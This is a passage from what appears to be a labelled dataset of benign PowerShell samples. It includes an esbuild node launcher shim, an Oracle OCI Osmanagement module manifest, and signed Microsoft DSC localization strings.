{$_.category.display."#cdata-section"}},path,vendorversion,@{Name="currentversion"; Expression = {$version}},releasedate,@{Name="Criticality"; Expression={($_.Criticality.display."#cdata-section").substring(0,$_.Criticality.display."#cdata-section".indexof("-"))}},@{Name="AtCurrent";Expression = {$_.vendorVersion -eq $version}} }
combined_dataset/train/non-malicious/sample_35_87.ps1
sample_35_87.ps1
#!/usr/bin/env pwsh $basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent $exe="" $pathsep=":" $env_node_path=$env:NODE_PATH $new_node_path="C:\Users\abder\component-maker\web\node_modules\.pnpm\esbuild@0.19.12\node_modules\esbuild\bin\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\esbuild@0.19.12\node_modules\esbuild\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\esbuild@0.19.12\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\node_modules" if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) { # Fix case when both the Windows and Linux builds of Node # are installed in the same directory $exe=".exe" $pathsep=";" } else { $new_node_path="/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/esbuild@0.19.12/node_modules/esbuild/bin/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/esbuild@0.19.12/node_modules/esbuild/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/esbuild@0.19.12/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/node_modules" } if ([string]::IsNullOrEmpty($env_node_path)) { $env:NODE_PATH=$new_node_path } else { $env:NODE_PATH="$new_node_path$pathsep$env_node_path" } $ret=0 if (Test-Path "$basedir/node$exe") { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "$basedir/node$exe" "$basedir/../esbuild/bin/esbuild" $args } else { & "$basedir/node$exe" "$basedir/../esbuild/bin/esbuild" $args } $ret=$LASTEXITCODE } else { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "node$exe" "$basedir/../esbuild/bin/esbuild" $args } else { & "node$exe" "$basedir/../esbuild/bin/esbuild" $args } $ret=$LASTEXITCODE } $env:NODE_PATH=$env_node_path exit $ret
combined_dataset/train/non-malicious/sample_63_16.ps1
sample_63_16.ps1
# # Module manifest for module 'OCI.PSModules.Osmanagement' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Osmanagement.dll' # Version number of this module. ModuleVersion = '85.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '08aa2c02-1476-4491-ace6-a15dc5ef7b7f' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Osmanagement Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '85.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Osmanagement.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Add-OCIOsmanagementPackagesToSoftwareSource', 'Disable-OCIOsmanagementModuleStreamOnManagedInstance', 'DisMount-OCIOsmanagementChildSoftwareSourceFromManagedInstance', 'DisMount-OCIOsmanagementManagedInstanceFromManagedInstanceGroup', 'DisMount-OCIOsmanagementParentSoftwareSourceFromManagedInstance', 'Enable-OCIOsmanagementModuleStreamOnManagedInstance', 'Get-OCIOsmanagementAvailablePackagesForManagedInstanceList', 'Get-OCIOsmanagementAvailableSoftwareSourcesForManagedInstanceList', 'Get-OCIOsmanagementAvailableUpdatesForManagedInstanceList', 'Get-OCIOsmanagementAvailableWindowsUpdatesForManagedInstanceList', 'Get-OCIOsmanagementErrataList', 'Get-OCIOsmanagementErratum', 'Get-OCIOsmanagementEvent', 'Get-OCIOsmanagementEventContent', 'Get-OCIOsmanagementEventReport', 'Get-OCIOsmanagementEventsList', 'Get-OCIOsmanagementManagedInstance', 'Get-OCIOsmanagementManagedInstanceErrataList', 'Get-OCIOsmanagementManagedInstanceGroup', 'Get-OCIOsmanagementManagedInstanceGroupsList', 'Get-OCIOsmanagementManagedInstancesList', 'Get-OCIOsmanagementModuleStream', 'Get-OCIOsmanagementModuleStreamProfile', 'Get-OCIOsmanagementModuleStreamProfilesList', 'Get-OCIOsmanagementModuleStreamProfilesOnManagedInstanceList', 'Get-OCIOsmanagementModuleStreamsList', 'Get-OCIOsmanagementModuleStreamsOnManagedInstanceList', 'Get-OCIOsmanagementPackagesInstalledOnManagedInstanceList', 'Get-OCIOsmanagementRelatedEventsList', 'Get-OCIOsmanagementScheduledJob', 'Get-OCIOsmanagementScheduledJobsList', 'Get-OCIOsmanagementSoftwarePackage', 'Get-OCIOsmanagementSoftwareSource', 'Get-OCIOsmanagementSoftwareSourcePackagesList', 'Get-OCIOsmanagementSoftwareSourcesList', 'Get-OCIOsmanagementUpcomingScheduledJobsList', 'Get-OCIOsmanagementWindowsUpdate', 'Get-OCIOsmanagementWindowsUpdatesInstalledOnManagedInstanceList', 'Get-OCIOsmanagementWindowsUpdatesList', 'Get-OCIOsmanagementWorkRequest', 'Get-OCIOsmanagementWorkRequestErrorsList', 'Get-OCIOsmanagementWorkRequestLogsList', 'Get-OCIOsmanagementWorkRequestsList', 'Invoke-OCIOsmanagementInstallAllPackageUpdatesOnManagedInstance', 'Invoke-OCIOsmanagementInstallAllUpdatesOnManagedInstanceGroup', 'Invoke-OCIOsmanagementInstallAllWindowsUpdatesOnManagedInstance', 'Invoke-OCIOsmanagementInstallModuleStreamProfileOnManagedInstance', 'Invoke-OCIOsmanagementInstallPackageOnManagedInstance', 'Invoke-OCIOsmanagementInstallPackageUpdateOnManagedInstance', 'Invoke-OCIOsmanagementInstallWindowsUpdateOnManagedInstance', 'Invoke-OCIOsmanagementManageModuleStreamsOnManagedInstance', 'Invoke-OCIOsmanagementRunScheduledJobNow', 'Invoke-OCIOsmanagementSearchSoftwarePackages', 'Invoke-OCIOsmanagementSkipNextScheduledJobExecution', 'Invoke-OCIOsmanagementSwitchModuleStreamOnManagedInstance', 'Mount-OCIOsmanagementChildSoftwareSourceToManagedInstance', 'Mount-OCIOsmanagementManagedInstanceToManagedInstanceGroup', 'Mount-OCIOsmanagementParentSoftwareSourceToManagedInstance', 'Move-OCIOsmanagementManagedInstanceGroupCompartment', 'Move-OCIOsmanagementScheduledJobCompartment', 'Move-OCIOsmanagementSoftwareSourceCompartment', 'New-OCIOsmanagementManagedInstanceGroup', 'New-OCIOsmanagementScheduledJob', 'New-OCIOsmanagementSoftwareSource', 'Remove-OCIOsmanagementEventContent', 'Remove-OCIOsmanagementManagedInstanceGroup', 'Remove-OCIOsmanagementModuleStreamProfileFromManagedInstance', 'Remove-OCIOsmanagementPackageFromManagedInstance', 'Remove-OCIOsmanagementPackagesFromSoftwareSource', 'Remove-OCIOsmanagementScheduledJob', 'Remove-OCIOsmanagementSoftwareSource', 'Update-OCIOsmanagementEvent', 'Update-OCIOsmanagementManagedInstance', 'Update-OCIOsmanagementManagedInstanceGroup', 'Update-OCIOsmanagementScheduledJob', 'Update-OCIOsmanagementSoftwareSource', 'Write-OCIOsmanagementEventContent' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Osmanagement' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_18_19.ps1
sample_18_19.ps1
# # Copyright (c) Microsoft Corporation. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # culture = "en-US" ConvertFrom-StringData -StringData @' FailToUninstall = Failed to uninstall the module '{0}'. FailToInstall = Failed to install the module '{0}'. InDesiredState = Resource '{0}' is in the desired state. NotInDesiredState = Resource '{0}' is not in the desired state. ModuleFound = Module '{0}' is found on the node. ModuleNotFound = Module '{0}' is not found on the node. ModuleWithRightPropertyNotFound = Module '{0}' with the right version or other properties not found in the node. ModuleNotFoundInRepository = Module '{0}' with the right version or other properties not found in the repository. StartGetModule = Begin invoking Get-Module '{0}'. StartFindModule = Begin invoking Find-Module '{0}'. StartInstallModule = Begin invoking Install-Module '{0}' version '{1}' from '{2}' repository. StartUnInstallModule = Begin invoking Remove-Item to remove the module '{0}' from the file system. InstalledSuccess = Successfully installed the module '{0}' UnInstalledSuccess = Successfully uninstalled the module '{0}' VersionMismatch = The installed module '{0}' has the version: '{1}' RepositoryMismatch = The installed module '{0}' is from the '{1}' repository. FoundModulePath = Found the module path: '{0}'. InstallationPolicyWarning = The module '{0}' was installed from the untrusted repository' {1}'. The InstallationPolicy is set to '{2}' to override the repository installation policy. If you trust the repository, set the repository installation policy to 'Trusted', that will also remove this warning. InstallationPolicyFailed = The current installation policy do not allow installation from this repository. Your current installation policy is '{0}' and the repository installation policy is '{1}'. If you trust the repository, either change the repository installation policy, or set the parameter InstallationPolicy to 'Trusted' to override the repository installation policy. GetTargetResourceMessage = Getting the current state of the module '{0}'. TestTargetResourceMessage = Determining if the module '{0}' is in the desired state. '@ # SIG # Begin signature block # MIIoLAYJKoZIhvcNAQcCoIIoHTCCKBkCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCD3aU/LXFNAmh3o # ImcuJKT1RWLilph3AMcVu5/5cons4KCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgwwghoIAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIJ7hwKBHO+zVAJc9YmBaZck # zR6zm6g8RBB+iNLMfN68MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAZ9UGQJeEV+p0yhDIOtxDTffva5bKq+eDEvHpNGrNQ3rC0qwYs9SCeMdd # szCzljuCyWw4s5/U4AKMMnLMjxpds4kHyIAWIlCw+7pHTQ2bD0CsvnzyGyUIwtwC # cuzOM2VncJy5YCDuP5qaD2TvYpxvs8wH5VsZ42Hyo/Gm26H7zAgHko9EEbl9TWGv # 8MWi368FwUIAuk7DjUu3MuMImNvfdj8mBR1omFx5ri3WfBTmsJoLhrYwKqxeRPAg # OrSz9KWzBotOKRJa0/uyO6BGpd2Bwz3D0xTtJQ/1uWfHq3uqrqjywAHoddjaVXUU # NQoqtVnnrSxlvFLLuDNdMDwQiNGMYaGCF5YwgheSBgorBgEEAYI3AwMBMYIXgjCC # F34GCSqGSIb3DQEHAqCCF28wghdrAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFRBgsq # hkiG9w0BCRABBKCCAUAEggE8MIIBOAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBbtJXdoQuKbeJCGviuNW349Bzz1JT9CEX32cEmD4oTBwIGZbwTAUfY # GBIyMDI0MDIxNDIxMDAzMi44N1owBIACAfSggdGkgc4wgcsxCzAJBgNVBAYTAlVT # MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK # ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJTAjBgNVBAsTHE1pY3Jvc29mdCBBbWVy # aWNhIE9wZXJhdGlvbnMxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVTTjozNzAzLTA1 # RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZaCC # Ee0wggcgMIIFCKADAgECAhMzAAAB6pokctVZP2FjAAEAAAHqMA0GCSqGSIb3DQEB # CwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTIzMTIwNjE4NDUz # MFoXDTI1MDMwNTE4NDUzMFowgcsxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJTAjBgNVBAsTHE1pY3Jvc29mdCBBbWVyaWNhIE9wZXJhdGlvbnMx # JzAlBgNVBAsTHm5TaGllbGQgVFNTIEVTTjozNzAzLTA1RTAtRDk0NzElMCMGA1UE # AxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBALULX/FIPyAH1fsu52ijatZvaSypoXrlC0mRtCmaxzob # huDkw6/pY/+4nhc4m8pf9zW3R6PihYGp0YPpVuNdfhPQp/KVO6WvMq2DGfFmHurW # 4PQPL/DkbQMkM9vqjFCvPq8xXZnfL1nGN9moGcN+oaif/hUMedmF1qzbay9ILkYf # LCxDYn3Qwzsvh5xjxOcsjzmRddNURJvT23Eva0cxisH4ocLLTx2zfpqfshw4Z9Ga # EdsWg9rmib1galUpLzF5PsQDBbtZtcv+Wjmn0pFEiMCWwEEcPVN0YG5ysYLdNBdJ # On2zsOOS+80W5RrQEqzPpSIIvEkZBJmF3aI4lMR8nV/FiTadjpIIqxX5Wa1XlqI/ # Nj+xagVjnjb7POsA+vh6Wu+v24HpyL8pyL/8Q4RFkRRME9cwT+Jr63yOtPbLe6DX # kxIJW6E6w2ua5kXBpEKtEQPTLPhX3CUxMYcglbnmI0zcc9UknX285K+sI/2WwRwT # BZkhDUULI86eQzV+zvzzR1qEBrlSY+oyTlYQrHMM9WnTzVflFDocZVTPpl2BDSNx # Pn0Qb4IoM9EPqbHyi/MilL+v/AQc8q3mQ6FiuPJAddz0ocpNZ9ekBWPVLKq3lfie # v4yl65u/438+NAQ+vSJgkONLMmuoguEGzmnK1vq/JHwdRUyn6YADiteM7Dja+Qd9 # AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUK4FFJaJR5ukXQFTUxMhyiwVuWV4wHwYD # VR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZO # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIw # VGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBc # BggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0 # cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYD # VR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMC # B4AwDQYJKoZIhvcNAQELBQADggIBACiDrVZeP37+fFVtfcbfsqC/Kg0Ce67bDceh # ZmPcfRgJ5Ddv0pJlOFVOFbiIVwesqeEUwFtclfi5AjneQ5ZJpYJpXfELOelG3dzj # +BKfd287/UY/cwmSkl+CjnoKBL3Ms6I/fWR+alR0+p6RlviK8xHoug9vkc2WrRZs # GnMVu2xOM2tPJ+qpyoDBzqv30N/ZRBOoNrS/PCkDwLGICDYqVs/IzAE49yv2ElPy # walf9mEsOHXV1lxtQDNcejVEmitJJ+1Vr2EtafPEbMQZp89TAuagROKE4YuohCUK # m+v3geJqTQarTBjqV25RCOT+XFngTMDD9wYx6TwndB2I1Ly726NiHUHs0uvq3ciC # V9JwNXdt1VZ63WK1NSgpVEsiK9EPABPt1EfXcKrfaPYkbkFi79eK1ETxx3NomYNU # HNiGU+X1Be8L7qpHwjo0g3/33XhtOr9LiDoUXh/V2LFTETiqV9Q8yLEavQW3j9LQ # /h/CaGz5YdGfrY8HiPfMIeLEokKxGf0hHcTEFApB0yLlq6KoHrFAEANR/4XuFIpl # 9sDywVIWt4tKqG+P6pRAXzg1zG5rGlslZWmw7XwgvhBu3jkLP9AxrsSYwY2ftrww # ze5NA6VDLS7pz+OrXXWLUmoyNrJNx5Bk0wEwzkQxzkOvmbdPhsOP1ZM0uA/xIV7c # SpNpZUw5MIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG # 9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO # BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEy # MDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw # MTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGlt # 